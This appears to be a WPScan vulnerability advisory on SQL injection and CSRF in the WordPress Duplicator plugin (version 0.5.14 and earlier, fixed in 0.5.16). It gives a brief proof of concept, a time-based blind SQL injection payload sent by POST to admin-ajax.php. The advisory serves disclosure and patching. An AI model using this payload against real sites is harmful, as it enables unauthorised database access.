Duplicator <= 0.5.14 - SQL Injection & CSRF

Sign up to our free email alerts service for instant vulnerability notifications!

Description
An authorised user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF).
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_package_delete
 
POST Data: duplicator_delid=1 and (select * from (select(sleep(20)))a)

Affects

Plugin duplicator
fixed in version 0.5.16

References

EXPLOITDB 36735
PACKETSTORM 131377
URL http://www.homelab.it/index.php/2015/04/10/wordpress-duplicator-0-5-14-sql-injection-vulnerability/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Claudio Viviani
Submitter Website http://www.homelab.it
Submitter Twitter homelabit
Views 275
Verified No
WPVDB ID 7895

Timeline

Publicly Published 2015-04-10 (over 1 year ago)
Added 2015-04-10 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.